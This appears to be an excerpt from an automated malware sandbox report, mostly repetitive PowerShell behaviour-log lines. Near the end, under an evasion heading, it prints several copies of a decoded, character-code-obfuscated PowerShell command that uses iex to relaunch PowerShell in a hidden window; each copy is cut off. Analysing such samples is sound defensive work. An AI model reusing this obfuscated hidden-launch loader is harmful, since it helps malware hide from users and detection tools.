Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9942Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9893Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9900Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep count: 9942 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680Thread sleep count: 9893 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: powershell.exe, 00000005.00000002.65025060540.00000000087DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded function bDXvV($kCrbx) {return [char]::ConvertFromUtf32($kCrbx)}&((bDXvV(0x69))+(bDXvV(0x65))+(bDXvV(0x78)))((bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x61))+(bDXvV(0x72))+(bDXvV(0x74))+(bDXvV(0x2d))+(bDXvV(0x50))+(bDXvV(0x72))+(bDXvV(0x6f))+(bDXvV(0x63))+(bDXvV(0x65))+(bDXvV(0x73))+(bDXvV(0x73))+(bDXvV(0x20))+(bDXvV(0x22))+(bDXvV(0x24))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x76))+(bDXvV(0x3a))+(bDXvV(0x57))+(bDXvV(0x49))+(bDXvV(0x4e))+(bDXvV(0x44))+(bDXvV(0x49))+(bDXvV(0x52))+(bDXvV(0x5c))+(bDXvV(0x53))+(bDXvV(0x79))+(bDXvV(0x73))+(bDXvV(0x57))+(bDXvV(0x4f))+(bDXvV(0x57))+(bDXvV(0x36))+(bDXvV(0x34))+(bDXvV(0x5c))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x73))+(bDXvV(0x50))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x53))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x5c))+(bDXvV(0x76))+(bDXvV(0x31))+(bDXvV(0x2e))+(bDXvV(0x30))+(bDXvV(0x5c))+(bDXvV(0x70))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x73))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x2e))+(bDXvV(0x65))+(bDXvV(0x78))+(bDXvV(0x65))+(bDXvV(0x22))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x79))+(bDXvV(0x6c))+(bDXvV(0x65))+(bDXvV(0x20))+(bDXvV(0x48))+(bDXvV(0x69))+(bDXvV(0x64))+(bDXvV(0x64))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x41))+(bDXvV(0x72))+(bDXvV(0x67)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded function bDXvV($kCrbx) {return [char]::ConvertFromUtf32($kCrbx)}&((bDXvV(0x69))+(bDXvV(0x65))+(bDXvV(0x78)))((bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x61))+(bDXvV(0x72))+(bDXvV(0x74))+(bDXvV(0x2d))+(bDXvV(0x50))+(bDXvV(0x72))+(bDXvV(0x6f))+(bDXvV(0x63))+(bDXvV(0x65))+(bDXvV(0x73))+(bDXvV(0x73))+(bDXvV(0x20))+(bDXvV(0x22))+(bDXvV(0x24))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x76))+(bDXvV(0x3a))+(bDXvV(0x57))+(bDXvV(0x49))+(bDXvV(0x4e))+(bDXvV(0x44))+(bDXvV(0x49))+(bDXvV(0x52))+(bDXvV(0x5c))+(bDXvV(0x53))+(bDXvV(0x79))+(bDXvV(0x73))+(bDXvV(0x57))+(bDXvV(0x4f))+(bDXvV(0x57))+(bDXvV(0x36))+(bDXvV(0x34))+(bDXvV(0x5c))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x73))+(bDXvV(0x50))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x53))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x5c))+(bDXvV(0x76))+(bDXvV(0x31))+(bDXvV(0x2e))+(bDXvV(0x30))+(bDXvV(0x5c))+(bDXvV(0x70))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x73))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x2e))+(bDXvV(0x65))+(bDXvV(0x78))+(bDXvV(0x65))+(bDXvV(0x22))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x79))+(bDXvV(0x6c))+(bDXvV(0x65))+(bDXvV(0x20))+(bDXvV(0x48))+(bDXvV(0x69))+(bDXvV(0x64))+(bDXvV(0x64))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x41))+(bDXvV(0x72))+(bDXvV(0x67)
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded function bDXvV($kCrbx) {return [char]::ConvertFromUtf32($kCrbx)}&((bDXvV(0x69))+(bDXvV(0x65))+(bDXvV(0x78)))((bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x61))+(bDXvV(0x72))+(bDXvV(0x74))+(bDXvV(0x2d))+(bDXvV(0x50))+(bDXvV(0x72))+(bDXvV(0x6f))+(bDXvV(0x63))+(bDXvV(0x65))+(bDXvV(0x73))+(bDXvV(0x73))+(bDXvV(0x20))+(bDXvV(0x22))+(bDXvV(0x24))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x76))+(bDXvV(0x3a))+(bDXvV(0x57))+(bDXvV(0x49))+(bDXvV(0x4e))+(bDXvV(0x44))+(bDXvV(0x49))+(bDXvV(0x52))+(bDXvV(0x5c))+(bDXvV(0x53))+(bDXvV(0x79))+(bDXvV(0x73))+(bDXvV(0x57))+(bDXvV(0x4f))+(bDXvV(0x57))+(bDXvV(0x36))+(bDXvV(0x34))+(bDXvV(0x5c))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x73))+(bDXvV(0x50))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x53))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x5c))+(bDXvV(0x76))+(bDXvV(0x31))+(bDXvV(0x2e))+(bDXvV(0x30))+(bDXvV(0x5c))+(bDXvV(0x70))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x73))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x2e))+(bDXvV(0x65))+(bDXvV(0x78))+(bDXvV(0x65))+(bDXvV(0x22))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x79))+(bDXvV(0x6c))+(bDXvV(0x65))+(bDXvV(0x20))+(bDXvV(0x48))+(bDXvV(0x69))+(bDXvV(0x64))+(bDXvV(0x64))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x41))+(bDXvV(0x72))+(bDXvV(0x67)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded function bDXvV($kCrbx) {return [char]::ConvertFromUtf32($kCrbx)}&((bDXvV(0x69))+(bDXvV(0x65))+(bDXvV(0x78)))((bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x61))+(bDXvV(0x72))+(bDXvV(0x74))+(bDXvV(0x2d))+(bDXvV(0x50))+(bDXvV(0x72))+(bDXvV(0x6f))+(bDXvV(0x63))+(bDXvV(0x65))+(bDXvV(0x73))+(bDXvV(0x73))+(bDXvV(0x20))+(bDXvV(0x22))+(bDXvV(0x24))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x76))+(bDXvV(0x3a))+(bDXvV(0x57))+(bDXvV(0x49))+(bDXvV(0x4e))+(bDXvV(0x44))+(bDXvV(0x49))+(bDXvV(0x52))+(bDXvV(0x5c))+(bDXvV(0x53))+(bDXvV(0x79))+(bDXvV(0x73))+(bDXvV(0x57))+(bDXvV(0x4f))+(bDXvV(0x57))+(bDXvV(0x36))+(bDXvV(0x34))+(bDXvV(0x5c))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x73))+(bDXvV(0x50))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x53))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x5c))+(bDXvV(0x76))+(bDXvV(0x31))+(bDXvV(0x2e))+(bDXvV(0x30))+(bDXvV(0x5c))+(bDXvV(0x70))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x65))+(bDXvV(0x72))+(bDXvV(0x73))+(bDXvV(0x68))+(bDXvV(0x65))+(bDXvV(0x6c))+(bDXvV(0x6c))+(bDXvV(0x2e))+(bDXvV(0x65))+(bDXvV(0x78))+(bDXvV(0x65))+(bDXvV(0x22))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x57))+(bDXvV(0x69))+(bDXvV(0x6e))+(bDXvV(0x64))+(bDXvV(0x6f))+(bDXvV(0x77))+(bDXvV(0x53))+(bDXvV(0x74))+(bDXvV(0x79))+(bDXvV(0x6c))+(bDXvV(0x65))+(bDXvV(0x20))+(bDXvV(0x48))+(bDXvV(0x69))+(bDXvV(0x64))+(bDXvV(0x64))+(bDXvV(0x65))+(bDXvV(0x6e))+(bDXvV(0x20))+(bDXvV(0x2d))+(bDXvV(0x41))+(bDXvV(0x72))+(bDXvV(0x67)Jump to behavior
